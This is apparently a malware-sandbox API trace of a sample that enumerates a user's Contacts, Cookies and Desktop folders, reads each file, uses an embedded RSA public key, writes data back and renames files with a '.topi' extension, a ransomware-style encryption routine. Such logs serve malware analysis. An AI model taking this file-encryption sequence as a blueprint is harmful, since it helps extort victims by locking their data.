HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.191] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.191] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.191] CloseHandle (hObject=0x6a8) returned 1 [0094.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.192] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0094.192] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.192] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.topi")) returned 1 [0094.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.193] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.195] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0094.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.195] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned=".contact" [0094.195] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.197] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=1172) returned 1 [0094.197] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.200] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x46e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.200] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.201] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.201] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x494, lpOverlapped=0x0) returned 1 [0094.201] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.201] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.202] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.202] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0094.202] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.202] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.202] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.203] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.203] GetLastError () returned 0x0 [0094.203] SetLastError (dwErrCode=0x0) [0094.203] GetLastError () returned 0x0 [0094.203] SetLastError (dwErrCode=0x0) [0094.203] GetLastError () returned 0x0 [0094.203] SetLastError (dwErrCode=0x0) [0094.203] GetLastError () returned 0x0 [0094.203] SetLastError (dwErrCode=0x0) [0094.203] GetLastError () returned 0x0 [0094.203] SetLastError (dwErrCode=0x0) [0094.203] GetLastError () returned 0x0 [0094.203] SetLastError (dwErrCode=0x0) [0094.203] GetLastError () returned 0x0 [0094.203] SetLastError (dwErrCode=0x0) [0094.203] GetLastError () returned 0x0 [0094.203] SetLastError (dwErrCode=0x0) [0094.203] GetLastError () returned 0x0 [0094.204] SetLastError (dwErrCode=0x0) [0094.204] GetLastError () returned 0x0 [0094.204] SetLastError (dwErrCode=0x0) [0094.204] GetLastError () returned 0x0 [0094.204] SetLastError (dwErrCode=0x0) [0094.204] GetLastError () returned 0x0 [0094.204] SetLastError (dwErrCode=0x0) [0094.204] GetLastError () returned 0x0 [0094.204] SetLastError (dwErrCode=0x0) [0094.204] GetLastError () returned 0x0 [0094.204] SetLastError (dwErrCode=0x0) [0094.204] GetLastError () returned 0x0 [0094.204] SetLastError (dwErrCode=0x0) [0094.204] GetLastError () returned 0x0 [0094.204] SetLastError (dwErrCode=0x0) [0094.204] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.204] GetLastError () returned 0x0 [0094.204] SetLastError (dwErrCode=0x0) [0094.205] GetLastError () returned 0x0 [0094.205] SetLastError (dwErrCode=0x0) [0094.205] GetLastError () returned 0x0 [0094.205] SetLastError (dwErrCode=0x0) [0094.205] GetLastError () returned 0x0 [0094.205] SetLastError (dwErrCode=0x0) [0094.205] GetLastError () returned 0x0 [0094.205] SetLastError (dwErrCode=0x0) [0094.205] GetLastError () returned 0x0 [0094.205] SetLastError (dwErrCode=0x0) [0094.205] GetLastError () returned 0x0 [0094.205] SetLastError (dwErrCode=0x0) [0094.205] GetLastError () returned 0x0 [0094.205] SetLastError (dwErrCode=0x0) [0094.205] GetLastError () returned 0x0 [0094.205] SetLastError (dwErrCode=0x0) [0094.205] GetLastError () returned 0x0 [0094.205] SetLastError (dwErrCode=0x0) [0094.205] GetLastError () returned 0x0 [0094.205] SetLastError (dwErrCode=0x0) [0094.205] GetLastError () returned 0x0 [0094.205] SetLastError (dwErrCode=0x0) [0094.205] GetLastError () returned 0x0 [0094.206] SetLastError (dwErrCode=0x0) [0094.206] GetLastError () returned 0x0 [0094.206] SetLastError (dwErrCode=0x0) [0094.206] GetLastError () returned 0x0 [0094.206] SetLastError (dwErrCode=0x0) [0094.206] GetLastError () returned 0x0 [0094.206] SetLastError (dwErrCode=0x0) [0094.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.206] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.206] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0094.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.206] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.206] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.206] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x490) returned 0x31d01f0 [0094.206] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x3193e68 [0094.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x320fab0 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3580 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8cd0 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3100 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e08 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8dc0 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8ee0 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x31ce620 [0094.207] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x31ce620, Size=0x218) returned 0x3165e90 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d0980 [0094.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8dc0 | out: hHeap=0x680000) returned 1 [0094.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8ee0 | out: hHeap=0x680000) returned 1 [0094.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8ee0 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d8dc0 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0094.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8ee0 | out: hHeap=0x680000) returned 1 [0094.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8dc0 | out: hHeap=0x680000) returned 1 [0094.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0094.208] GetCurrentThreadId () returned 0x8c4 [0094.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1160 [0094.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31d0688 [0094.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.209] GetCurrentThreadId () returned 0x8c4 [0094.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x31bee50 [0094.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bee50 | out: hHeap=0x680000) returned 1 [0094.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.209] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8dc0 [0094.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0094.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8ee0 [0094.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8df0 [0094.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.211] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.topi")) returned 1 [0094.211] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.211] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.211] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.215] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.215] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0094.215] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0094.215] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0094.215] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0094.215] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0094.215] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0094.215] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0094.216] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.216] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.216] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.216] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.216] PathFindFileNameW (pszPath="") returned="" [0094.216] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0094.217] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0094.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0094.218] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.218] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.218] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.218] PathFindFileNameW (pszPath="") returned="" [0094.218] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe") returned=".exe" [0094.218] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\%localappdata%24fd5b09-6d4d-435f-beb9-3d272f67be2csample.exe.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3134738 | out: hHeap=0x680000) returned 1 [0094.218] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc1f24c0, ftCreationTime.dwHighDateTime=0x1d5b5c2, ftLastAccessTime.dwLowDateTime=0x4c0be680, ftLastAccessTime.dwHighDateTime=0x1d5c02c, ftLastWriteTime.dwLowDateTime=0x4c0be680, ftLastWriteTime.dwHighDateTime=0x1d5c02c, nFileSizeHigh=0x0, nFileSizeLow=0x11af9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-onKqnd5MCC.m4a", cAlternateFileName="-ONKQN~1.M4A")) returned 1 [0094.218] 